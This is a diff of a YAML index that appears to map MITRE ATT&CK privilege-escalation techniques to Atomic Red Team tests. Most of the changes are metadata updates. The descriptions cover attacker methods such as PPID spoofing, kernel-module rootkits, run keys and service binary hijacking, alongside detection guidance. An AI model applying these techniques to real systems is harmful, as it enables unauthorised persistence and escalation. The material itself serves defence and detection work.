       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
-      - Azure AD
       - SaaS
-      x_mitre_version: '2.7'
+      - Identity Provider
+      x_mitre_version: '2.8'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
+      - 'Active Directory: Active Directory Object Creation'
+      - 'Active Directory: Active Directory Object Modification'
       type: attack-pattern
       id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
       created: '2020-01-19T16:10:15.008Z'
@@ -19801,10 +20111,18 @@ privilege-escalation:
         description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
           Principals. Retrieved January 19, 2020.
         url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+      - source_name: Lacework AI Resource Hijacking 2024
+        description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+          June 6). Lacework Labs. Retrieved July 1, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
       - source_name: GCP SSH Key Add
         description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
           October 1, 2020.
         url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
       - source_name: Blue Cloud of Death Video
         description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
           Azure. Retrieved November 21, 2019.'
@@ -19813,10 +20131,20 @@ privilege-escalation:
         description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
           Azure. Retrieved October 23, 2019.'
         url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+      - source_name: Microsoft Entra ID App Passwords
+        description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+          authentication with legacy applications using app passwords. Retrieved May
+          28, 2024.
+        url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
         url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+      - source_name: Mandiant APT42 Operations 2024
+        description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+          Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+          Retrieved May 28, 2024.'
+        url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
       - source_name: Expel Behind the Scenes
         description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
           July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -19833,9 +20161,6 @@ privilege-escalation:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.001
     atomic_tests: []
   T1134.003:
@@ -19899,7 +20224,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.003:
     technique:
@@ -19988,7 +20312,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.003
     atomic_tests: []
   T1134.004:
@@ -20046,7 +20369,7 @@ privilege-escalation:
         Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
 
         Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-03T02:15:42.360Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Access Token Manipulation: Parent PID Spoofing'
       x_mitre_detection: |-
@@ -20071,12 +20394,11 @@ privilege-escalation:
       - Host Forensic Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.004
     atomic_tests: []
   T1546.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:27:11.065Z'
       name: 'Event Triggered Execution: Change Default File Association'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by a file type association. When a file is opened, the default program
@@ -20102,7 +20424,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Stefan Kanthak
@@ -20116,7 +20437,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -20143,8 +20463,8 @@ privilege-escalation:
         url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
       - source_name: Microsoft File Handlers
         description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
-          Retrieved November 13, 2014.
-        url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+          Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
       - source_name: Microsoft Assoc Oct 2017
         description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
           7, 2018.
@@ -20155,7 +20475,8 @@ privilege-escalation:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.001
     atomic_tests: []
   T1055.014:
@@ -20226,7 +20547,7 @@ privilege-escalation:
         resources, and possibly elevated privileges. Execution via VDSO hijacking
         may also evade detection from security products since the execution is masked
         under a legitimate process.  "
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-07T17:09:09.048Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: VDSO Hijacking
       x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -20253,7 +20574,6 @@ privilege-escalation:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.014:
     technique:
@@ -20293,7 +20613,7 @@ privilege-escalation:
         The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
 
         Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T00:16:01.732Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Emond'
       x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -20313,12 +20633,11 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.014
     atomic_tests: []
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -20372,11 +20691,10 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547.001:
     technique:
-      modified: '2023-10-16T09:08:22.319Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
       description: |-
         Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -20463,9 +20781,9 @@ privilege-escalation:
           in the Registry. Retrieved August 3, 2020.
         url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Oddvar Moe RunOnceEx Mar 2018
         description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
           from Autoruns.exe. Retrieved June 29, 2018.
@@ -20478,12 +20796,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.001
     atomic_tests: []
   T1098:
     technique:
-      modified: '2024-01-16T22:24:38.234Z'
+      modified: '2024-10-15T15:35:57.382Z'
       name: Account Manipulation
       description: "Adversaries may manipulate accounts to maintain and/or elevate
         access to victim systems. Account manipulation may consist of any action that
@@ -20519,16 +20836,15 @@ privilege-escalation:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - SaaS
       - Network
       - Containers
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -20569,7 +20885,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098
     atomic_tests:
     - name: GCP - Delete Service Account Key
@@ -20648,138 +20963,137 @@ privilege-escalation:
           terraform apply -auto-approve
   T1547.006:
     technique:
-      x_mitre_platforms:
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-12T17:30:54.170Z'
+      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+      description: |-
+        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
+
+        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
       x_mitre_contributors:
       - Wayne Silva, F-Secure Countercept
       - Anastasios Pingios
       - Jeremy Galloway
       - Red Canary
       - Eric Kaiser @ideologysec
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: |
+        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
+
+        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'File: File Creation'
+      - 'File: File Modification'
+      - 'Kernel: Kernel Module Load'
+      - 'Process: Process Creation'
+      x_mitre_permissions_required:
+      - root
       type: attack-pattern
       id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
       created: '2020-01-24T17:42:23.339Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1547.006
         url: https://attack.mitre.org/techniques/T1547/006
+        external_id: T1547.006
       - source_name: Apple Developer Configuration Profile
-        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
         description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
           September 23, 2021.
+        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
       - source_name: Apple Kernel Extension Deprecation
-        url: https://developer.apple.com/support/kernel-extensions/
         description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
           Alternatives. Retrieved November 4, 2020.
+        url: https://developer.apple.com/support/kernel-extensions/
       - source_name: System and kernel extensions in macOS
-        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
         description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
           March 31, 2022.
+        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
       - source_name: GitHub Reptile
-        url: https://github.com/f0rb1dd3n/Reptile
         description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
           April 9, 2018.
+        url: https://github.com/f0rb1dd3n/Reptile
       - source_name: Volatility Phalanx2
-        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
         description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
           to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
       - source_name: iDefense Rootkit Overview
-        url: http://www.megasecurity.org/papers/Rootkits.pdf
         description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
-          April 6, 2018.
+          September 12, 2024.
+        url: https://www.megasecurity.org/papers/Rootkits.pdf
       - source_name: Linux Loadable Kernel Module Insert and Remove LKMs
-        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
         description: Henderson, B. (2006, September 24). How To Insert And Remove
           LKMs. Retrieved April 9, 2018.
+        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
       - source_name: CrowdStrike Linux Rootkit
-        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
         description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
           Retrieved December 21, 2017.
+        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
       - source_name: GitHub Diamorphine
-        url: https://github.com/m0nad/Diamorphine
         description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
           Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+        url: https://github.com/m0nad/Diamorphine
       - source_name: Securelist Ventir
-        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
         description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
           your MacOS spy. Retrieved April 6, 2018.'
+        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
       - source_name: User Approved Kernel Extension Pike’s
-        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
         description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
           Loading…. Retrieved September 23, 2021.
+        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
       - source_name: Linux Kernel Module Programming Guide
-        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
         description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
           Retrieved April 6, 2018.
+        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
       - source_name: Linux Kernel Programming
-        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
         description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
           Module Programming Guide. Retrieved April 6, 2018.
+        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
       - source_name: Trend Micro Skidmap
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
         description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
           Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
           Retrieved June 4, 2020.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
       - source_name: Purves Kextpocalypse 2
-        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
         description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
           . Retrieved September 23, 2021.
+        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
       - source_name: RSAC 2015 San Francisco Patrick Wardle
-        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
         description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
           Retrieved April 6, 2018.
+        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
       - source_name: Synack Secure Kernel Extension Broken
-        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
         description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
           Extension Loading’ is Broken. Retrieved April 6, 2018.
+        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
       - source_name: Wikipedia Loadable Kernel Module
-        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
         description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
           April 9, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
-
-        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
-        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
-        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
-        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
-      x_mitre_detection: |
-        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
-        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
-
-        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      - kill_chain_name: mitre-attack
-        phase_name: privilege-escalation
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'File: File Creation'
-      - 'File: File Modification'
-      - 'Kernel: Kernel Module Load'
-      - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - root
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.006
     atomic_tests: []
   T1574.013:
@@ -20816,7 +21130,7 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -20842,12 +21156,10 @@ privilege-escalation:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -20925,9 +21237,8 @@ privilege-escalation:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
